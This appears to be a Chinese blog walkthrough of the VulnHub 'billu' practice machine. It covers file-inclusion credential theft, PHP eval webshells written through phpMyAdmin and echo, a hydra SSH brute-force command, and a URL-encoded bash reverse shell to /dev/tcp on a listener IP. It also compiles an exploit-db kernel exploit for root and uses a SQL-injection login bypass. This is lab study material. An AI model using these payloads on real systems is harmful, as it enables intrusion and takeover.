渗透测试系列 — VulnHub–billu

正文:

以后直接主要部分,其他的操作,熟悉了就懒了。。。
这个靶机学到的东西挺多的。蛮不错。

一.文件包含漏洞

http://ip/test   有文件包含漏洞,很明显的提示
get不行就post下载
1)下载phpmy/conifg.inc.php  里面有root账号和密码(到这,靶机的root就拿到,可以直接ssh上去了。。。)
2)下载c.php文件,有phpmyadmin的账号和密码
3)登陆进去,拿到web账号和密码

二.phpmyadmin拿webshell(试了两种都没有权限)

https://www.cnblogs.com/0xcc/p/5079275.html 学习网站
1.
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’);
select darkmoon from moon into outfile ‘/var/www/upload_images/caidao2.php’;
Drop TABLE IF EXISTS moon;
#1045 – Access denied for user ‘billu’@’localhost’ (using password: YES)
2.
select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘/var/www/upload_images/caidao2.php’
#1045 – Access denied for user ‘billu’@’localhost’ (using password: YES)
3.
root权限 通过日志文件拿shell
https://www.cnblogs.com/xishaonian/p/6622818.html

三.ssh的爆破

file=/etc/passwd
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
用户名 ica
hydra -l Panel -t 6 -P passwd.txt ssh://192.168.244.147
ssh爆破太慢了,一般都不放它(跟机子性能有很大关系,我的机子线程最大开6,多了莫法执行)

四.拿到普通用户权限

上网搜了下

教程

panel.php登陆进去,可以添加图片
我首先想到的是图片马,也没有去找这个文件
从作者那get到一个新姿势
http://192.168.244.147/panel.php?cmd=cat%20/etc/passwd;ls
post填  load=/uploaded_images/jack.jpg&continue=continue(为什么是这个呢,当选择add时,用burp拦截下包就清楚了)
2.
本地监听:nc -lvnp 5555
echo “bash -i >& /dev/tcp/192.168.244.129/4444 0>&1” | bash
url编码:http://192.168.244.147/panel.php?cmd=echo%20%22bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.244.129%2f5555%200%3E%261%22%20%7C%20bash
post:load=/uploaded_images/jack.jpg&continue=continue
反弹成功,登陆到用户

五. 算是get到一个新姿势吧(拿到webshell)

找到uploaded_images写入
echo ‘<?php eval($_POST[‘123456′]);?>’ >> caidao.php

六.Ubuntu提权操作

Ubuntu著名的本地提权漏洞exp:
https://www.exploit-db.com/exploits/37292/
chmod 777 37292.c
gcc 37292.c -o exp
执行exp,提权至root,测试成功

七.其实这个靶机名是sql注入相关的。。(sql注入)

审计index.php源码,发现以下过滤规则
‘ or 1=1 — \’ user和passwd同时为它,登陆进去,普通用户权限
 
2018.7.16

发表评论

电子邮件地址不会被公开。 必填项已用*标注